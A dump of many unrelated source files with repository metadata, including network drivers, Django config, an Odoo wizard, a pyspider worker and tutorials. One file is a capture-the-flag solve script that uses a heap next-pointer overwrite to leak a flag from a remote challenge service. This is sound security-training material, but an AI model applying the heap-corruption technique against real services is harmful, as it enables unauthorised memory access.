    def test_user_query_info_byauthcode_04(self):
        """Empty auth code -> error code 302."""
        result = user_query_info_byauthcode(account_mail_Gary, "")
        self.assertIn('"code":302', result.text)
    def test_user_query_info_byauthcode_05(self):
        """Wrong auth code -> error code 811."""
        result = user_query_info_byauthcode(account_mail_Gary, authCode)
        self.assertIn('"code":811', result.text)
if __name__ == '__main__':
unittest.main()
| [
"tangguobing2011@163.com"
] | tangguobing2011@163.com |
64f07b85e6b523f464618b624f7e189b7ea0b60c | a94b729855ba7239830952f0814cf19850ad123c | /voltha/adapters/adtran_olt/net/adtran_zmq.py | 9cbeae68c0f58b7ec726d9e9e3be522031eb87d9 | [
"Apache-2.0"
] | permissive | kthomas8/voltha | 37b1e69c1736ad780bf6233fd5272cfaab5bbfb9 | b5d1c18994de5c342ac97429c733b0b597df5690 | refs/heads/master | 2021-01-01T19:40:53.623682 | 2017-07-13T08:50:19 | 2017-07-27T17:42:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,310 | py | #
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import binascii
import struct
import structlog
from txzmq import ZmqEndpoint, ZmqFactory
from txzmq.connection import ZmqConnection
from zmq import constants
log = structlog.get_logger()
zmq_factory = ZmqFactory()
# An OMCI message minimally has a 32-bit PON index and 32-bit ONU ID.
_OLT_TASK_ZEROMQ_OMCI_TCP_PORT = 25656
class AdtranZmqClient(object):
    """
    ZeroMQ client for the Adtran OLT PON agent packet in/out service.

    The agent expects an external PAIR socket.  OMCI frames carry an
    8-byte header (32-bit PON index, 32-bit ONU ID) before the payload.
    """
    def __init__(self, ip_address, rx_callback=None,
                 port=_OLT_TASK_ZEROMQ_OMCI_TCP_PORT):
        self.external_conn = 'tcp://{}:{}'.format(ip_address, port)
        self.zmq_endpoint = ZmqEndpoint('connect', self.external_conn)
        self.socket = ZmqPairConnection(zmq_factory, self.zmq_endpoint)
        # Install a no-op receiver when the caller supplies no callback.
        self.socket.onReceive = rx_callback or AdtranZmqClient.rx_nop

    def send(self, data):
        """Transmit raw bytes to the agent, logging (not raising) failures."""
        try:
            self.socket.send(data)
        except Exception as e:
            log.exception(e.message)

    def shutdown(self):
        """Detach the receive callback, then close the underlying socket."""
        self.socket.onReceive = AdtranZmqClient.rx_nop
        self.socket.shutdown()

    @staticmethod
    def rx_nop(message):
        # Default receiver: drop the frame with a debug trace.
        log.debug('Discarding ZMQ message, no receiver specified')

    @staticmethod
    def encode_omci_message(msg, pon_index, onu_id):
        """
        Build an OMCI Tx packet for the specified ONU.

        :param msg: (str) hex-encoded OMCI message to send
        :param pon_index: (unsigned int) PON Port index
        :param onu_id: (unsigned int) ONU ID
        :return: (bytes) octet string to send
        """
        assert msg
        header = struct.pack('!II', pon_index, onu_id)
        return header + binascii.unhexlify(msg)

    @staticmethod
    def decode_packet(packet):
        """
        Decode a packet delivered by the ZMQ client.

        :param packet: (bytes) packet (wrapped in a list by the transport)
        :return: (long, long, bytes, boolean) PON index, ONU ID, frame
                 contents, and a flag indicating whether it is OMCI
        """
        if not isinstance(packet, list):
            return -1, -1, None, False
        # TODO: multi-part messages are ignored; only OMCI is supported.
        return AdtranZmqClient._decode_omci_message(packet[0])

    @staticmethod
    def _decode_omci_message(packet):
        """Unpack the 8-byte header and return the trailing OMCI bytes."""
        pon_index, onu_id = struct.unpack_from('!II', packet)
        return pon_index, onu_id, packet[8:], True

    @staticmethod
    def _decode_packet_in_message(packet):
        # TODO: packet-in (non-OMCI) frames are not yet supported.
        pon_index, onu_id = struct.unpack_from('!II', packet)
        return pon_index, onu_id, binascii.hexlify(packet[8:]), False
class ZmqPairConnection(ZmqConnection):
    """
    Bidirectional messages to/from the socket.
    Wrapper around a ZeroMQ PAIR socket.
    """
    # PAIR (not PUSH): this side mirrors the agent's external PAIR socket.
    socketType = constants.PAIR
    def messageReceived(self, message):
        """
        Called on incoming message from ZeroMQ.
        :param message: message data
        """
        self.onReceive(message)
    def onReceive(self, message):
        """
        Called on incoming message received from other end of the pair.
        AdtranZmqClient replaces this attribute with the user's callback.
        :param message: message data
        """
        # Passing `self` keeps the offending instance in the error message.
        raise NotImplementedError(self)
| [
"knursimu@ciena.com"
] | knursimu@ciena.com |
6021a14840f4dfe5737a0e4cca506c1db90ac4e9 | d721258b53f0f44b1010cb8e8efac8e2a5c96c26 | /eamon/wsgi.py | b12308914222d44e2f8c86e1c45d9fd3a9fb0f6b | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | kdechant/eamon | a6662285f51a6cad5797bb9be92ca709ae36921c | 080a43aa80c3a1605c402e68616545a8e9c7975c | refs/heads/master | 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 | MIT | 2023-03-14T21:09:55 | 2016-01-13T08:07:28 | TypeScript | UTF-8 | Python | false | false | 561 | py | """
WSGI config for eamonproj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
import time
import traceback
import signal
import sys
from django.core.wsgi import get_wsgi_application
# Make the deployed project and its virtualenv importable by the WSGI server.
sys.path.append('/var/www/vhosts/eamon')
sys.path.append('/var/www/vhosts/eamon/venv/lib/python3.5/site-packages')
# Point Django at the project settings unless the environment already does.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eamon.settings")
# Module-level WSGI callable discovered by the server.
application = get_wsgi_application()
| [
"keith.dechant@gmail.com"
] | keith.dechant@gmail.com |
ab9d65909b79eb706fa5cf8aaf2e9c7dcf02f382 | 036a41c913b3a4e7ae265e22a672dd89302d3200 | /LOCF_剑指Offer/Offer10I/Offer10I_Python_1.py | 766252643cf67ffa677bc1c16c41cc875a9d4433 | [] | no_license | ChangxingJiang/LeetCode | e76f96ebda68d7ade53575354479cfc33ad4f627 | a2209206cdd7229dd33e416f611e71a984a8dd9e | refs/heads/master | 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | class Solution:
def fib(self, n: int) -> int:
if n == 0:
return 0
if n == 1:
return 1
a = 0
b = 1
for _ in range(n - 1):
a, b = b, a + b
return b % 1000000007
if __name__ == "__main__":
    # Ad-hoc smoke test; expected values noted inline.
    print(Solution().fib(2)) # 1
    print(Solution().fib(5)) # 5
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
dcbf41f5c810985b668d17f1de7878308645db71 | 0644c03cc3f89b0fc22d9e548a2d06e6a594f1b4 | /l10n_th_account_pit/wizard/print_wht_cert_wizard.py | a526a3939af6f823385ad6781a822ab337ec3e31 | [] | no_license | phongyanon/pb2_addons | 552fbf4cd904c81a1fd0ac5817dc1cf8f3377096 | 4c69002eeda2de8e806c8a168d8ba9f28527c8d2 | refs/heads/master | 2021-01-19T13:20:53.749866 | 2017-12-20T11:12:51 | 2017-12-20T11:12:51 | 97,184,424 | 0 | 0 | null | 2017-07-14T02:29:53 | 2017-07-14T02:29:52 | null | UTF-8 | Python | false | false | 1,638 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api
class PrintWhtCertWizard(models.TransientModel):
    _inherit = 'print.wht.cert.wizard'
    @api.model
    def _prepare_wht_line(self, voucher):
        """Build WHT certificate lines; in PIT-withhold mode they are
        derived from the voucher's personal-income-tax lines instead of
        the standard source."""
        wht_lines = []
        if self._context.get('pit_withhold', False):
            for line in voucher.pit_line:
                vals = {
                    'pit_id': line.id,
                    'wht_cert_income_type': line.wht_cert_income_type,
                    'wht_cert_income_desc': line.wht_cert_income_desc,
                    'base': line.amount_income,
                    'amount': line.amount_wht,
                }
                # (0, 0, vals) is the ORM one2many "create" command tuple.
                wht_lines.append((0, 0, vals))
        else:
            wht_lines = super(PrintWhtCertWizard,
                              self)._prepare_wht_line(voucher)
        return wht_lines
    @api.model
    def _save_selection(self):
        """Persist the wizard selections; in PIT-withhold mode write them
        back to the voucher and each line's PIT record directly."""
        if self._context.get('pit_withhold', False):
            # Only fill the tax form when the voucher has none yet.
            if not self.voucher_id.income_tax_form:
                self.voucher_id.income_tax_form = self.income_tax_form
            self.voucher_id.tax_payer = self.tax_payer
            for line in self.wht_line:
                line.pit_id.write({
                    'wht_cert_income_type': line.wht_cert_income_type,
                    'wht_cert_income_desc': line.wht_cert_income_desc,
                })
        else:
            super(PrintWhtCertWizard, self)._save_selection()
class WhtCertTaxLine(models.TransientModel):
    _inherit = 'wht.cert.tax.line'
    # Back-reference to the personal income tax line this cert line
    # was prepared from (set by PrintWhtCertWizard._prepare_wht_line).
    pit_id = fields.Many2one(
        'personal.income.tax',
        string='PIT Line',
        readonly=True,
    )
| [
"kittiu@gmail.com"
] | kittiu@gmail.com |
dbd41fc82545780aec01e119160e4bf1141ad632 | 7fb95b0e0fbc9af63d002e8f589ec464f11b2dcf | /mozy/apps/mosaic/migrations/0005_auto_20150502_1437.py | 6e631a504f97df9ac28d2b5626e3d8a4e2368147 | [
"MIT"
] | permissive | pipermerriam/mozy | 2907656de8a724abb1f635235ba8d572cdc1a2c9 | 472d3dc77519aae8abd719819f07a929cfd53641 | refs/heads/master | 2023-08-28T09:41:43.696557 | 2015-05-03T10:39:46 | 2015-05-03T10:39:46 | 33,761,997 | 0 | 0 | null | 2015-04-23T18:40:44 | 2015-04-11T04:04:59 | Python | UTF-8 | Python | false | false | 633 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Schema step 0005: drop NormalizedSourceImage.tile_size and restrict
    MosaicImage.tile_size to fixed 20/40/60/80-pixel choices (default 40)."""
    dependencies = [
        ('mosaic', '0004_auto_20150502_1351'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='normalizedsourceimage',
            name='tile_size',
        ),
        migrations.AlterField(
            model_name='mosaicimage',
            name='tile_size',
            field=models.PositiveSmallIntegerField(default=40, choices=[(20, b'20 pixels'), (40, b'40 pixels'), (60, b'60 pixels'), (80, b'80 pixels')]),
        ),
    ]
| [
"piper@simpleenergy.com"
] | piper@simpleenergy.com |
f2a1af90f8f17139a5a61568bb00db96f91ff840 | b3aba10f1d40bf5dc2fd2bc86d7c8d17c02ad214 | /Python/InterfaceFolder/Interface.py | c96c5d964afabbf13d46c5cc5caeb7ad9978552d | [] | no_license | jjdblast/BigData | 2259d8dd6dc774e85c34c9fcb8ef845b099f0dbb | 442d330da61d3a1cd14a63421a345c1b0b0bd64a | refs/heads/master | 2020-12-31T05:10:05.291026 | 2016-07-28T09:47:01 | 2016-07-28T09:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | #coding:utf-8
'''
Created on 2016年6月2日
@author: giant
'''
def my_callback(input):
    # Example callback (Python 2 syntax): prints a greeting, then echoes
    # the argument it was invoked with.  Note `input` shadows the builtin.
    print "hellow world"
    print "function my_callback was called with %s input" % (input,)
| [
"hsw.time@gmail.com"
] | hsw.time@gmail.com |
accd25f62f52cf65f8c258e2dcce607d5f25fb6f | 1db2e2238b4ef9c1b6ca3b99508693ee254d6904 | /develop/distribution_analysis/get_distribution.py | ed2a0fbe5958631f1fe4ab77686f8e4032248c97 | [] | no_license | pgreisen/pythonscripts | 8674e08095f76edf08ef2059300349218079724c | 0aadf8f96d19b306c1bc44a772e766a06fe3408b | refs/heads/master | 2021-07-06T23:54:57.774342 | 2021-06-08T19:36:36 | 2021-06-08T19:36:36 | 22,017,192 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py |
#!/usr/bin/env python
import os,shutil
from optparse import OptionParser
from pylab import *
from numpy import mean,median
def read_file(filename):
    """Read one float per line from *filename* and return them as a list.

    A context manager guarantees the handle is closed even if a line
    fails to parse (the original leaked the handle on such an error).
    """
    with open(filename, 'r') as handle:
        return [float(line.strip('\n')) for line in handle]
def concatenate_lists(a, b):
    """Return a new list holding the items of *a* followed by those of *b*."""
    joined = a + b
    return joined
def main():
parser = OptionParser()
parser.add_option('-f',dest='datafile',
help='Datafile')
parser.add_option('-l',dest='list_of_datafiles',
help='List containing naming of data files')
parser.add_option('-c',dest='concatenate',
help='Should all the data be pooled together')
(options,args) = parser.parse_args()
# String of atom names from the ligand to be aligned with
# Set the path to the pdb file
datafile = options.datafile
list_of_datafiles = options.list_of_datafiles
total_data = []
concatenate = False
if(datafile != None):
datafile = read_file(datafile)
hist(datafile,100,normed=1)
savefig('histogram.png')
# Multiple disitrbution plot
elif(list_of_datafiles != None):
fl_list = open(list_of_datafiles,'r')
f = [f.strip('\n') for f in fl_list.readlines() ]
fl_list.close()
if(concatenate == True):
for ln in f:
datafile = read_file(ln)
total_data = concatenate_lists(total_data,datafile)
hist(total_data,100,normed=1)
savefig('histogram.png')
else:
dummy = 0
dataset = []
for ln in f:
dataset.append(read_file(ln))
print "The mean is ", round(mean(dataset[dummy]),3)
print "The median is ",round(median(dataset[dummy]),3)
hist(dataset[dummy],100,normed=1)
dummy = dummy + 1
savefig('mulitple_histogram.png')
if __name__ == "__main__":
main()
| [
"pgreisen@gmail.com"
] | pgreisen@gmail.com |
b28c119440b275211e9419c52249b7e15e69c698 | bc371b9238956bc00cc33654b1d68651c6edf371 | /writeups/2021/UMassCTF/suckless2/solve.py | 3630e3e60dbe0df2ab62d7d4bc19878c0b703861 | [
"MIT"
] | permissive | welchbj/ctf | 447202921fbf5c467af62b4f72f5f489c7c471f0 | 3b54769a8312f755eb97e7b4c954e4b5829af8e1 | refs/heads/master | 2023-08-19T03:28:33.264186 | 2023-08-11T18:38:17 | 2023-08-11T18:38:17 | 213,223,536 | 167 | 28 | MIT | 2023-04-18T13:29:33 | 2019-10-06T18:42:03 | Python | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python3
from pwn import *
the_binary = "./suckless2_dist"
context.binary = the_binary
elf = context.binary
context.terminal = ["tmux", "splitw", "-h"]
def init_io():
    """Open a pwntools tube to the target.

    REMOTE -> connect to the hosted CTF service; STRACE -> run the local
    binary under strace (syscall trace written to trace.txt); otherwise
    run the binary directly.  GDB additionally attaches a debugger in a
    tmux split before returning.
    """
    if args.REMOTE:
        io = remote("34.72.244.178", 8089)
    elif args.STRACE:
        io = process(["strace", "-o" ,"trace.txt", the_binary])
    else:
        io = process(the_binary)
    if args.GDB:
        gdb.attach(io, f"""
        file {the_binary}
        continue
        """)
    return io
class Const:
    # Address the leak routine reads from; named flag_base, so presumably
    # the in-binary flag buffer -- confirm against the challenge binary.
    flag_base = 0x000000000042a3d0
def add(io, sz, content):
    """Drive the target's 'new' note command with the given length and body."""
    # An embedded newline would terminate the note early and desync the menu.
    assert b"\n" not in content
    io.sendlineafter("> ", "new")
    io.sendlineafter("length: ", str(sz))
    io.sendlineafter("note: ", content)
def leak_flag_part(offset):
    """Leak flag bytes starting at *offset* via the target's version string.

    NOTE(review): heap mechanics inferred from the payload layout -- the
    first note appears to overwrite a chunk's next pointer with the
    address of the binary's `version` symbol, so a later allocation
    writes the flag address there; confirm against the challenge binary.
    """
    io = init_io()
    # Overwrite chunk next ptr for arbitrary write.
    where = elf.sym.version
    what = Const.flag_base + offset
    add(io, 1, b"A"*0x10 + p64(where))
    add(io, 1, b"X")
    add(io, 1, p64(what))
    io.sendlineafter("> ", "version")
    io.recvuntil("this is ")
    return io.recvuntil("\n", drop=True).decode()
def main():
    """Leak the flag one chunk at a time until the closing brace arrives.

    (An unused local copy of Const.flag_base was removed; it shadowed the
    constant without ever being read.)
    """
    flag = ""
    while "}" not in flag:
        flag += leak_flag_part(offset=len(flag))
        log.info(f"Flag: {flag}")
if __name__ == "__main__":
main()
| [
"welch18@vt.edu"
] | welch18@vt.edu |
9cf1edebac26b014d06bb74d8579bc2d35c8a658 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/68_8.py | 8d459b58026c87bc4d0809ae531ada70dcad3ea6 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,806 | py | How to Get Coordinate Of Screen in Python Turtle ?
Turtle is a Python module that provides a simple graphics library. In
this article we will learn how to get the coordinates of a screen click in Python Turtle.
Turtle has many built-in functions; to create this program we use the following.
> **import turtle – > **This is the python library which allow us to access
> turtle library.
>
> **Turtle()– >** This Method is used to make object.
>
> **onscreenclick(functionname,1) – > **This is turtle function which sends
> the coordinate to function; 1 is for left click and 3 is for Right click
>
>
>
>
>
>
>
> **speed()– > **This is used to increase or decrease the speed of the turtle
> pointer.
>
> **listen()– > **This gives the turtle screen focus so that it can collect incoming events such as clicks and key presses.
>
> **done()– > **This is used to hold the screen.
## Python3
__
__
__
__
__
__
__
# turtle library
import turtle
#This to make turtle object
tess=turtle.Turtle()
# self defined function to print coordinate
def buttonclick(x,y):
    """Click handler: echo the (x, y) screen coordinates of the click."""
    print("You clicked at this coordinate({0},{1})".format(x,y))
#onscreen function to send coordinate
turtle.onscreenclick(buttonclick,1)
turtle.listen() # give the turtle screen focus so it receives events
turtle.speed(10) # set the speed
turtle.done() # hold the screen
---
__
__
### **Output:**

Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
9c32a0e4932286ee4c8d66addc4f77cfc63023fb | 919e3e3d772d6a79e7639bde32bf698088bc241f | /pyspider/result/result_worker.py | ddfd7545d8dc0fc20273f9cb2192499ca363bee4 | [
"Apache-2.0"
] | permissive | UoToGK/crawler-pyspider | 96cfee1e16db1376b5ea0c5fa51650a04c14f714 | 29ba13905c73081097df9ef646a5c8194eb024be | refs/heads/master | 2023-09-05T18:33:17.470385 | 2021-11-05T10:44:15 | 2021-11-05T10:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,619 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-10-19 15:37:46
import time
import json
import logging
from six.moves import queue as Queue
from pyspider.helper.logging import task_log
logger = logging.getLogger("result")
class ResultWorker(object):
    """
    Consume (task, result) pairs from *inqueue* and persist them to
    *resultdb*.  Override `on_result` if different handling is needed.
    """

    def __init__(self, resultdb, inqueue):
        self.resultdb = resultdb
        self.inqueue = inqueue
        self._quit = False

    def on_result(self, task, result):
        """Called for every result; saves valid results to resultdb.

        (Bug fix: this docstring was previously placed *after* the first
        statement, making it a dead string literal instead of a docstring.)
        """
        task_log(task, 'on result')
        if not result:
            return
        if 'taskid' in task and 'project' in task and 'url' in task:
            logger.info('result %s:%s %s -> %.30r' % (
                task['project'], task['taskid'], task['url'], result))
            return self.resultdb.save(
                project=task['project'],
                taskid=task['taskid'],
                url=task['url'],
                result=result
            )
        else:
            logger.warning('result UNKNOW -> %.30r' % result)
            return

    def quit(self):
        # Ask `run` to leave its loop after the current iteration.
        self._quit = True

    def run(self):
        """Run loop: pull from the queue until `quit` is called."""
        logger.info("result_worker starting...")
        while not self._quit:
            try:
                task, result = self.inqueue.get(timeout=1)
                self.on_result(task, result)
            except Queue.Empty:
                # Poll timeout with nothing queued; try again.
                continue
            except KeyboardInterrupt:
                break
            except AssertionError as e:
                logger.error(e)
                continue
            except Exception as e:
                logger.exception(e)
                continue
        logger.info("result_worker exiting...")
class OneResultWorker(ResultWorker):
    '''Result Worker for one mode, write results to stdout'''

    def on_result(self, task, result):
        '''Called every result'''
        if not result:
            return
        if any(key not in task for key in ('taskid', 'project', 'url')):
            logger.warning('result UNKNOW -> %.30r' % result)
            return
        logger.info('result %s:%s %s -> %.30r' % (
            task['project'], task['taskid'], task['url'], result))
        payload = {
            'taskid': task['taskid'],
            'project': task['project'],
            'url': task['url'],
            'result': result,
            'updatetime': time.time()
        }
        print(json.dumps(payload))
| [
"binhui.ni@yourdream.cc"
] | binhui.ni@yourdream.cc |
71e40389f60fb122edde1239c65f8e55412083f9 | 9d7d69178c6f1f1db6ed6767e0af32bfe836549c | /new_workspace/Gumtree_Workspace/Magnet/Yick/P9363/100 Alignment/20210130/Overnight/2021_Jan_Yick_scan_time_56_1K_125Oe_ZFC_40min.py | 9cf66fe21d2297a88318f687b3e726608073a945 | [] | no_license | Gumtree/Quokka_scripts | 217958288b59adbdaf00a9a13ece42f169003889 | c9687d963552023d7408a8530005a99aabea1697 | refs/heads/master | 2023-08-30T20:47:32.142903 | 2023-08-18T03:38:09 | 2023-08-18T03:38:09 | 8,191,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | histmem preset 60
# Count into time-binned histogram memory (60 s preset set above).
histmem mode time
#Time scan
#-----------------------------------------------------------------
#System reset (15 minutes)
# Loosen the temperature tolerance for the coarse moves below.
hset /sample/tc1/control/tolerance1 1
# Field to 0 Oe before cooling (zero-field cool, per the script name).
drive ma1_setpoint 0
# Thermal reset: warm to 90 K, then cool to base temperature.
drive tc1_driveable 90
wait 10
drive tc1_driveable 4
# Apply the 125 Oe measuring field after the zero-field cool.
drive ma1_setpoint 125
wait 10
# Tighten tolerance and step up toward the 56.1 K measurement point.
hset /sample/tc1/control/tolerance1 0.2
drive tc1_driveable 50
# drive tc1_driveable 52
drive tc1_driveable 54
# drive tc1_driveable 54
drive tc1_driveable 55.5
hset /sample/tc1/control/tolerance1 0.1
drive tc1_driveable 56.1
wait 10
#-----------------------------------------------------------------
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 10 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 20 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 30 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 40 minutes
| [
"quokka@DAV5-QUOKKA.nbi.ansto.gov.au"
] | quokka@DAV5-QUOKKA.nbi.ansto.gov.au |
068bfe1d684059513b8ff1b15160ec145471ffc3 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Amazon/IAM/GetGroupPolicy.py | f85f2b09ae61777531adae6278c6723fdd2e9698 | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,397 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# GetGroupPolicy
# Retrieves the specified policy document for the specified group.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetGroupPolicy(Choreography):
    """Temboo Choreo wrapper for Amazon IAM GetGroupPolicy: retrieves a
    group's named policy document."""
    def __init__(self, temboo_session):
        """
        Create a new instance of the GetGroupPolicy Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        Choreography.__init__(self, temboo_session, '/Library/Amazon/IAM/GetGroupPolicy')
    def new_input_set(self):
        # Factory for this Choreo's typed input set.
        return GetGroupPolicyInputSet()
    def _make_result_set(self, result, path):
        return GetGroupPolicyResultSet(result, path)
    def _make_execution(self, session, exec_id, path):
        return GetGroupPolicyChoreographyExecution(session, exec_id, path)
class GetGroupPolicyInputSet(InputSet):
    """
    Typed input container for the GetGroupPolicy Choreo; each setter
    records one named input used when the Choreo executes.
    """
    def set_AWSAccessKeyId(self, value):
        """((required, string) The Access Key ID provided by Amazon Web Services.)"""
        self._set_input('AWSAccessKeyId', value)
    def set_AWSSecretKeyId(self, value):
        """((required, string) The Secret Key ID provided by Amazon Web Services.)"""
        self._set_input('AWSSecretKeyId', value)
    def set_GroupName(self, value):
        """((required, string) The name of the group to return.)"""
        self._set_input('GroupName', value)
    def set_PolicyName(self, value):
        """((required, string) Name of the policy document to get.)"""
        self._set_input('PolicyName', value)
    def set_ResponseFormat(self, value):
        """((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)"""
        self._set_input('ResponseFormat', value)
class GetGroupPolicyResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the GetGroupPolicy Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # Parse a JSON document; note the parameter name shadows the builtin `str`.
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
        """
        return self._output.get('Response', None)
class GetGroupPolicyChoreographyExecution(ChoreographyExecution):
    # Binds executions of this Choreo to its typed result set.
    def _make_result_set(self, response, path):
        return GetGroupPolicyResultSet(response, path)
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
44153f43db578ddeaf085d737762fe112938c9e7 | eb79c567ca500b39e268eb270c792688a20b1f08 | /generatePage.py | 4c7ad31a6e6ca54e0c7c6645be1c034961e043c9 | [] | no_license | RickeyEstes2/arxiv-equations | db746ba993a2a6ad9907594e15e6148acd52ac85 | 93047961d9de04d7aa79635a6f59a8680242637b | refs/heads/master | 2023-03-16T12:19:41.378386 | 2018-11-26T05:20:06 | 2018-11-26T05:20:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | #!/usr/bin/env python
# This script will read in a pickle that includes extracted metadata and
# equations from an article, and general yaml (with front end matter) to
# render into a page.
import pickle
import operator
import frontmatter
import os
import sys
from helpers import get_equation_counts
input_pkl = sys.argv[1]

# We should be in directory where script is running
here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)

# Bug fix: the original re-tested `here` (which always exists), so the
# _posts output directory was never actually created at this point.
posts = '%s/_posts' % here
if not os.path.exists(posts):
    os.mkdir(posts)
# result.keys()
# dict_keys(['equations', 'metadata', 'inputFile', 'latex', 'uid']
################################################################################
# ARTICLE TEMPLATE
################################################################################
# Don't continue unless we have metrics file
if not os.path.exists(input_pkl):
    print('Cannot find metrics file, exiting')
    sys.exit(1)
# Load the extraction result and the front-matter page template.
result = pickle.load(open(input_pkl,'rb'))
template = frontmatter.load('%s/templates/article-template.md' %here)
# The article summary becomes the page body.
template.content = result['metadata']['summary']
# Add metadata to template, only specific fields
template.metadata['id'] = result['metadata']['id']
template.metadata['updated'] = result['metadata']['updated']
template.metadata['published'] = result['metadata']['published']
# Parse year, month, day
month = result['metadata']['published_parsed'].tm_mon
day = result['metadata']['published_parsed'].tm_mday
year = result['metadata']['published_parsed'].tm_year
template.metadata['published_month'] = month
template.metadata['published_day'] = day
template.metadata['published_year'] = year
template.metadata['title'] = result['metadata']['title']
template.metadata['search_query'] = result['metadata']['title_detail']['base']
template.metadata['title_detail'] = result['metadata']['title_detail']['value']
template.metadata['authors'] = result['metadata']['authors']
template.metadata['comment'] = result['metadata']['arxiv_comment']
# Parse links into list
links = []
for link in result['metadata']['links']:
